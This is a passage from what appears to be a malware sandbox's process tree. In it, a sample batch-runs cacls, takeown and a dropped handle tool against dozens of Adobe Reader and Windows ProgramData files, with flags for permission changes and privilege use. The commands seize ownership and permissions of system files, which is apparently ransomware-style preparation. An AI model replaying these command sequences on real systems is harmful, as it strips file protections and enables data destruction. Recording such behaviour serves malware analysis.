    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif"
    3⤵
    - Modifies file permissions
    PID:936
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "forms_distributed.gif" -nobanner
    3⤵
    PID:1640
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "forms_distributed.gif" -nobanner
      4⤵
      PID:976
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:932
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif""
  2⤵
  PID:1940
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif" /E /G Admin:F /C
    3⤵
    PID:1968
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif"
    3⤵
    PID:1808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "reviews_sent.gif" -nobanner
    3⤵
    PID:896
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "reviews_sent.gif" -nobanner
      4⤵
      PID:1912
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:268
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif""
  2⤵
  PID:2040
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif" /E /G Admin:F /C
    3⤵
    PID:1772
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif"
    3⤵
    - Modifies file permissions
    PID:1696
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "stop_collection_data.gif" -nobanner
    3⤵
    PID:1544
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "stop_collection_data.gif" -nobanner
      4⤵
      PID:1080
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1332
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm""
  2⤵
  PID:1744
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm" /E /G Admin:F /C
    3⤵
    PID:872
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm"
    3⤵
    - Modifies file permissions
    PID:1388
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "ReadMe.htm" -nobanner
    3⤵
    PID:1576
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "ReadMe.htm" -nobanner
      4⤵
      PID:1720
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:936
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf""
  2⤵
  PID:976
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf" /E /G Admin:F /C
    3⤵
    PID:2020
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf"
    3⤵
    PID:1532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "MinionPro-It.otf" -nobanner
    3⤵
    PID:1064
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "MinionPro-It.otf" -nobanner
      4⤵
      PID:1072
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1808
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB""
  2⤵
  PID:1912
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB" /E /G Admin:F /C
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB"
    3⤵
    - Modifies file permissions
    PID:1528
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "ZX______.PFB" -nobanner
    3⤵
    PID:1480
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "ZX______.PFB" -nobanner
      4⤵
      PID:1664
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1696
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp""
  2⤵
  PID:1080
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp" /E /G Admin:F /C
    3⤵
    PID:844
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp"
    3⤵
    PID:1100
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "brt04.hsp" -nobanner
    3⤵
    PID:812
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "brt04.hsp" -nobanner
      4⤵
      PID:716
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1388
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env""
  2⤵
  PID:1164
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env" /E /G Admin:F /C
    3⤵
    PID:1156
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env"
    3⤵
    PID:1608
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "engphon.env" -nobanner
    3⤵
    PID:584
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "engphon.env" -nobanner
      4⤵
      PID:2020
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1048
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT""
  2⤵
  PID:1108
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" /E /G Admin:F /C
    3⤵
    PID:1984
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT"
    3⤵
    PID:1640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "CORPCHAR.TXT" -nobanner
    3⤵
    PID:1940
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "CORPCHAR.TXT" -nobanner
      4⤵
      PID:1484
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1496
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT""
  2⤵
  PID:1900
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT" /E /G Admin:F /C
    3⤵
    PID:1752
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT"
    3⤵
    - Modifies file permissions
    PID:896
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "CP1250.TXT" -nobanner
    3⤵
    PID:2040
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "CP1250.TXT" -nobanner
      4⤵
      PID:844
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:900
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""
  2⤵
  PID:812
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C
    3⤵
    PID:1080
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1996
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "overlay.png" -nobanner
    3⤵
    PID:1700
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "overlay.png" -nobanner
      4⤵
      PID:1888
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1944
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc""
  2⤵
  PID:584
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc" /E /G Admin:F /C
    3⤵
    PID:1164
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc"
    3⤵
    PID:1368
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "adobepdf.xdc" -nobanner
    3⤵
    PID:976
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "adobepdf.xdc" -nobanner
      4⤵
      PID:752
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:968
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""
  2⤵
  PID:1940
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1108
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1148
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1752
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:896
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:844
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat""
  2⤵
  PID:716
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat" /E /G Admin:F /C
    3⤵
    PID:1972
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat"
    3⤵
    PID:1332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "qmgr0.dat" -nobanner
    3⤵
    PID:1732
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "qmgr0.dat" -nobanner
      4⤵
      PID:1996
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1888
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""
  2⤵
  PID:2020
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C
    3⤵
    PID:336
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1500
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:932
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:1528
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1984
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""
  2⤵
  PID:1484
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C
    3⤵
    PID:1968
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "device.png" -nobanner
    3⤵
    PID:1144
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "device.png" -nobanner
      4⤵
      PID:1912
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1100
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml""
  2⤵
  PID:1752
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1696
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1972
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:1332
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1996
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml""
  2⤵
  PID:1700
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1900
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1048
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:936
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:1500
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1528
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""
  2⤵
  PID:268
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C
    3⤵
    PID:2020
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1072
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "behavior.xml" -nobanner
    3⤵
    PID:1968
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "behavior.xml" -nobanner
      4⤵
      PID:1108
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1148
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""
  2⤵
  PID:1144
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:844
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1940
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:1544
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1608
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif""
  2⤵
  PID:1972
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif" /E /G Admin:F /C
    3⤵
    PID:1752
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif"
    3⤵
    - Modifies file permissions
    PID:1480
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "bl.gif" -nobanner
    3⤵
    PID:1588
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "bl.gif" -nobanner
      4⤵
      PID:336
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1640
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif""
  2⤵
  PID:1164
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif" /E /G Admin:F /C
    3⤵
    PID:1156
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif"
    3⤵
    - Modifies file permissions
    PID:1888
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "forms_super.gif" -nobanner
    3⤵
    PID:1944
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "forms_super.gif" -nobanner
      4⤵
      PID:2020
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1072
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif""
  2⤵
  PID:1108
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif" /E /G Admin:F /C
    3⤵
    PID:1516
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif"
    3⤵
    - Modifies file permissions
    PID:812
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "review_browser.gif" -nobanner
    3⤵
    PID:1100
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "review_browser.gif" -nobanner
      4⤵
      PID:584
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1772
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif""
  2⤵
  PID:1696
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif" /E /G Admin:F /C
    3⤵
    PID:1608
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif"
    3⤵
    - Modifies file permissions
    PID:1144
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "tl.gif" -nobanner
    3⤵
    PID:896
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "tl.gif" -nobanner
      4⤵
      PID:604
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:900
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V""
  2⤵
  PID:1092
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V" /E /G Admin:F /C
    3⤵
    PID:1640
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "Identity-V" -nobanner
    3⤵
    PID:1368
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "Identity-V" -nobanner
      4⤵
      PID:1700
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1888
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf""
  2⤵
  PID:2020
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf" /E /G Admin:F /C
    3⤵
    PID:1528
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf"
    3⤵
    PID:872
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "MyriadPro-Bold.otf" -nobanner
    3⤵
    PID:1168
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "MyriadPro-Bold.otf" -nobanner
      4⤵
      PID:744
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:812
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe""
  2⤵
  PID:432
- - C:\Windows\SysWOW64\cacls.exe
